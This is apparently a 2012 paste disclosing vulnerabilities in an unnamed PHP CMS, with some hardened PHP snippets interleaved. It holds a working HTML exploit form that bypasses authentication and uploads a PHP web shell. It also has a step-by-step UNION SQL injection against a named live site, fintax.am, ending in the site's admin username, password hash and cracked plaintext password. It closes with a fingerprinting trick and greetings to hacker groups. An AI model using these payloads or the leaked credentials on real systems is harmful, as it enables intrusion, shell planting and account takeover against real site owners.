Pasted by a guest, Nov 16th, 2012
I can't find any information in this CMS that identifies the web studio behind it, and the reason to submit this CMS together with its vulnerabilities is that it has a bit funny vulnerabilities)
CMS: http://www.boxca.com/ql6b1sq3nb79/cms_unknown.rar.html

Here we go:

================VULNERABLE CODE===============
//admin/en/save_home.php

<?php
session_start();
if(!isset($_SESSION['username']))
{
header('Location: ../index.php');
// no exit/die after the redirect: the header is sent, but the rest of this file still executes
}
?>
<?php
include('../../config.php');
mysql_connect($hostname, $username, $password) or DIE('Connection to host is failed, perhaps the service is down!');
mysql_select_db($dbname) or DIE('Database name is not available!');

$home = mysql_query('SELECT title_en, en, image FROM home_text');
$home = mysql_fetch_array($home);

$homeServices = mysql_query('SELECT id, en FROM homeservices ORDER BY id asc');
$homenews = mysql_query('SELECT id,date_en,content_en FROM homenews');
?>

<?php
$err = "?";
$uploaddir = '../../images/';
$img =$home['image'];
if($_FILES['file']['name'] != ''){

if(file_exists($uploaddir . $_FILES['file']['name'])){

$err .="&imgexist=". $_FILES['file']['name'];
header('Location: admin_index.php' . $err);
}
// the file is stored under the client-supplied name with no extension or content check
move_uploaded_file($_FILES['file']['tmp_name'], $uploaddir . $_FILES['file']['name']);
$image = '../images/' . $_FILES['file']['name'];
mysql_query('UPDATE home_text SET image="' . $image . '"');
echo mysql_error();
if($img != ''){
unlink('../' . $img);
}

}
if(stripslashes($_POST['title']) != $home['title_en'])
{
$str= mysql_real_escape_string(stripslashes($_POST['title']));
mysql_query('UPDATE home_text SET title_en="' . $str . '"');

}
if(stripslashes($_POST['about']) != $home['en'])
{
$str= mysql_real_escape_string(stripslashes($_POST['about']));
mysql_query('UPDATE home_text SET en=\'' . $str . '\'');
}

for($i = 0; $i < count($_POST['serv_arr']) ; $i++)
{
$data = mysql_fetch_array($homeServices);

if($_POST['serv_arr'][$i] != ""){
if(stripslashes($_POST['serv_arr'][$i]) != $data['en']){
$str = mysql_real_escape_string(stripslashes($_POST['serv_arr'][$i]));
mysql_query('UPDATE homeservices SET en="'.$str. '" WHERE id="' . $data['id'] . '"');
}
}
else{
mysql_query('DELETE FROM homeservices WHERE id=' . $data['id'] );
}
}
if($_POST['new_serv'] !=""){
$str = mysql_real_escape_string(stripslashes($_POST['new_serv']));
mysql_query('INSERT INTO homeservices(en) VALUES("' . $str .'")');
}

for($i = 0; $i < count($_POST['date']) ; $i++)
{
$data = mysql_fetch_array($homenews);
if($_POST['date'][$i] != $data['date_en'] || $_POST['new'][$i] != $data['content_en']){
$str1 = mysql_real_escape_string(stripslashes($_POST['date'][$i]));
$str2 = mysql_real_escape_string(stripslashes($_POST['new'][$i]));
mysql_query('UPDATE homenews SET date_en="' . $str1 . '" WHERE id=' .$data['id'] );
mysql_query('UPDATE homenews SET content_en="' . $str2 .'" WHERE id=' .$data['id']);
}
}

header('Location: admin_index.php?page=home');
?>

============END OF VULNERABLE CODE=============

Notice the flaw in the session check: when no session exists it sends a Location header but never calls exit, so the rest of the script (the file upload and all the UPDATE queries) still runs for an unauthenticated request)

Here is our:
====AUTH BYPASS + REMOTE SHELL UPLOAD EXPLOIT===


<!DOCTYPE HTML>
<head>
<title></title>
</head>
<body>
<center>
<form method="post" action="http://TARGET_SITE/admin/en/save_home.php" enctype="multipart/form-data">
<input type="hidden" name="title" value="SIKDIR!">
<br>
<br>
<label>Select your backdoor:(1)</label>
<input type="file" name="file" accept="image/*">==>(2)
<input type="hidden" name="about" readonly="true" value="Sikdir!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="serv_arr[]" value="SIKDIR!">
<input type="hidden" name="new_serv" placeholder="SIKDIR!">
<input type="hidden" name="date[]" value="sikdir!">
<input type="hidden" name="new[]" value="AUTH BYPASS + SHELL UPLOAD EXPLOIT BY AKASTEP">
<input type="hidden" name="date[]" value="SIKDIR!">
<input type="hidden" name="new[]" value="sikdir!">
<input type="submit" value="PwN IT ASAP))">
<!-- Your shell can be found here:=> site.tld/images/yourfilename.php -->
</form>
</center>
</body>
</html>


==============END OF EXPLOIT================

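The hardened form of the two flaws above (the redirect without exit, and the upload that trusts the client-supplied file name), as an added example that is not code from this CMS; it assumes PHP 7.1 or later with the fileinfo extension, and the err=upload query parameter is a made-up name.

```php
<?php
// Added example, not the CMS's own code: a hardened replacement for the auth
// guard and upload step of admin/en/save_home.php.

session_start();
if (!isset($_SESSION['username'])) {
    header('Location: ../index.php');
    exit; // the missing piece: a Location header does not stop the script
}

// Stores an uploaded image and returns the server-chosen file name, or null
// if the upload is rejected. $file is one entry of $_FILES.
function storeHomeImage(array $file, string $uploadDir): ?string
{
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png', 'gif' => 'image/gif'];
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Extension allow-list: .php and anything else not listed is rejected
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }
    // Check the bytes, not the client-supplied name or Content-Type
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $allowed[$ext]) {
        return null;
    }
    // The client never controls the destination path or name
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($uploadDir, '/') . '/' . $name)) {
        return null;
    }
    return $name;
}

if (isset($_FILES['file']) && $_FILES['file']['name'] !== '') {
    $stored = storeHomeImage($_FILES['file'], '../../images/');
    if ($stored === null) {
        header('Location: admin_index.php?page=home&err=upload'); // err=upload is a made-up name
        exit;
    }
    // record '../images/' . $stored in home_text with a prepared statement,
    // and unlink the previous image only after the new one is stored
}
```

Pair this with web server configuration that never executes scripts from the images directory, since that is where uploaded files land.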
Blind SQLi Vulnerability:

==============Vulnerable Code==================
//ru/services.php

<?php
$id = mysql_query('SELECT max(id) as max, min(id) as min FROM services');
$id = mysql_fetch_array($id);
// loose comparison: a string that starts with a number passes the range check, and the raw value is then concatenated into the query
if(isset($_GET['id']) && $_GET['id'] >=$id['min'] && $_GET['id'] <= $id['max'])
{
$text = mysql_query('SELECT image,service_name_ru,service_full_text_ru FROM services where id=' . $_GET["id"]);
$text = mysql_fetch_array($text);
echo '<div class="serv_image">
<img style="margin-top: 80px;" src="' . $text["image"] . '" width="345" height="210" alt="FINTAX" />
<div class="shad_left"></div>
<div class="shad_right"></div>
</div>
<div class="serv_text">
<p class="service_title">' . $text["service_name_ru"] . '</p>
<p class="service_description">' . $text["service_full_text_ru"] . '</p>
</div>
<div class="clear"></div>';
}

==============END OF Vulnerable Code============

http://www.fintax.am/ru/index.php?page=services&id=1 order by 3--

1,2,3

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,2,3 LIMIT 1 offset 1*/--

5.1.62-cll

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(column_name) from information_schema.columns limit 1)),3 limit 1 offset 1*/--

mysql> select 0x7573657273 \g
+--------------+
| 0x7573657273 |
+--------------+
| users        |
+--------------+
1 row in set (0.00 sec)

mysql>

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(table_name) from information_schema.tables where table_schema=database() limit 1 offset 11)),3 limit 1 offset 1*/--

Columns:

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(column_name) from information_schema.columns where table_name=0x7573657273 limit 1 offset 0)),3 limit 1 offset 1*/--

id

hex(group_concat(username,0x7c,password)) from users

username

mysql> select 0x757365726E616D65 \g
+--------------------+
| 0x757365726E616D65 |
+--------------------+
| username           |
+--------------------+
1 row in set (0.00 sec)

password

mysql> select 0x70617373776F7264 \g
+--------------------+
| 0x70617373776F7264 |
+--------------------+
| password           |
+--------------------+
1 row in set (0.00 sec)

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(group_concat(username,0x7c,password)) from users)),3 limit 1 offset 1*/--

mysql> select 0x66696E746178323031327C3636363961386131323331303665366130643364373665386365616261626638 \
    -> \g
+----------------------------------------------------------------------------------------+
| 0x66696E746178323031327C3636363961386131323331303665366130643364373665386365616261626638 |
+----------------------------------------------------------------------------------------+
| fintax2012|6669a8a123106e6a0d3d76e8ceababf8                                            |
+----------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>

http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select convert(group_concat(username,0x7c,password) using latin1) from users)),3 limit 1 offset 1*/--

fintax2012|6669a8a123106e6a0d3d76e8ceababf8

fintax2012
supersecret1010

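An added example, not the CMS's code, contrasting the range check from ru/services.php with an integer-validated, parameterised lookup; it assumes PHP 7.4 or later and an existing PDO connection $db to the same database.

```php
<?php
// Added example, not the CMS's own code. Shows why the min/max check in
// ru/services.php lets a payload through, and a hardened lookup beside it.

// The original guard, extracted as a function: it decides whether $_GET['id']
// reaches the string-concatenated query.
function originalRangeCheck($rawId, int $min, int $max): bool
{
    return isset($rawId) && $rawId >= $min && $rawId <= $max;
}
// A leading-numeric string such as '1 order by 3--' satisfies both comparisons:
// PHP 5/7 compare it as its numeric prefix (1), PHP 8 falls back to a string
// comparison that also passes for this input. The full string is then appended
// to the SQL, which is the injection shown above.

// Hardened: accept only a plain integer and bind it as a parameter, so the
// value can never change the statement's structure.
function loadService(PDO $db, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // '1 order by 3--' is rejected here, before any query
    }
    $stmt = $db->prepare(
        'SELECT image, service_name_ru, service_full_text_ru FROM services WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Rendering: escape database values on output instead of echoing them raw,
// as the original does.
function renderService(array $text): string
{
    $e = fn($s) => htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
    return '<div class="serv_text"><p class="service_title">' . $e($text['service_name_ru'])
        . '</p><p class="service_description">' . $e($text['service_full_text_ru'])
        . '</p></div>';
}

// Usage ($db assumed to be an existing PDO connection):
// $row = loadService($db, $_GET['id'] ?? null);
// echo $row === null ? '' : renderService($row);
```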
And finally I want to say that you can fingerprint this CMS using the following technique:
when entering an incorrect password for admin it gives

header('Location: index.php?err=asd');

/admin/index.php?err=asd

Notice: asd <= this is a hardcoded value in /admin/loginproc.php



================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securityvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep